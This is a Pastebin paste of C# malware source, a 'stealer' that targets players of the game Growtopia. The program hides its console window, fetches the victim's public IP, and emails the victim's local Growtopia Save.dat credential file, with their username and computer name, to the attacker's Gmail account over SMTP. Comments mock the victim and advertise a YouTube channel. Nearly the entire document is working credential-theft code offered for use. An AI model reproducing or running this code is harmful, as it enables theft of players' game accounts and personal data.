Advertisement
Guest User

Untitled

a guest
Aug 13th, 2018
631
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 3.03 KB | None | 0 0
  1. using System;
  2. using System.Net;
  3. using System.Net.Mail;
  4. using System.Runtime.InteropServices;
  5.  
  6. namespace HiYT
  7. {
  8.     internal class Program
  9.     {
  10.         private const int SW_HIDE = 0;
  11.  
  12.         private const int SW_SHOW = 5;
  13.  
  14.         [DllImport("user32.dll")]
  15.         private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
  16.        
  17.         [DllImport("Kernel32")]
  18.         private static extern IntPtr GetConsoleWindow();
  19.  
  20.         private static void Main(string[] args)
  21.         {
  22.             //Hides ur ip
  23.             IntPtr hwnd = Program.GetConsoleWindow();
  24.             Program.ShowWindow(hwnd, 0);
  25.             string externalip = new WebClient().DownloadString("http://icanhazip.com");
  26.             externalip = new WebClient().DownloadString("http://bot.whatismyipaddress.com");
  27.             externalip = new WebClient().DownloadString("http://ipinfo.io/ip");
  28.             //Hides ur ip
  29.  
  30.             string GT = "\\Growtopia\\Save.dat"; // PASS DOWNLOAD
  31.  
  32.             string appdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
  33.             string lol = externalip.ToUpper();
  34.             string sub = "http://youtube.com/c/hekkingkrew";
  35.             string info = " Opened the stealer (What a nub lol).\nPlease Sub:";
  36.             string help = " Use save decoder to decode the account!";
  37.  
  38.             ////////Use An new gmail acc!////////
  39.             string gmailUser, gmailPass, toEmail;
  40.             NewMethod(out gmailUser, out gmailPass, out toEmail);
  41.             ////////Use An new gmail acc!////////
  42.  
  43.  
  44.  
  45.  
  46.             ///// DO NOT CHANGE ANY OF THIS!!!!!!!!!\\\\
  47.             string fromEmail = gmailUser;
  48.             string userName = Environment.UserName;
  49.             string computerName = Environment.MachineName.ToString();
  50.             string subject = string.Concat(new string[]
  51.             {
  52.                 Environment.UserName,
  53.                 " / ",
  54.                 computerName,
  55.                 "s GT Acc - ",
  56.                 Environment.UserName
  57.             });
  58.             string body = Environment.UserName + info + sub + help;
  59.  
  60.             string gtprofile = appdata + GT;
  61.  
  62.             MailMessage message = new MailMessage(fromEmail, toEmail, subject, body);
  63.             SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
  64.             smtp.EnableSsl = true;
  65.             smtp.Credentials = new NetworkCredential(gmailUser, gmailPass);
  66.             bool flag = GT != string.Empty || GT != null;
  67.             if (flag)
  68.             {
  69.  
  70.                 if (flag)
  71.                 {
  72.                     Attachment attach = new Attachment(gtprofile);
  73.                     message.Attachments.Add(attach);
  74.  
  75.                 }
  76.             }
  77.             smtp.Send(message);
  78.         }
  79.  
  80.         private static void NewMethod(out string gmailUser, out string gmailPass, out string toEmail)
  81.         {
  82.             gmailUser = "YourGmail@gmail.com";
  83.             gmailPass = "YourPass";
  84.             toEmail = gmailUser;
  85.             //Have Alot Of Fun xD
  86.         }
  87.     }
  88. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement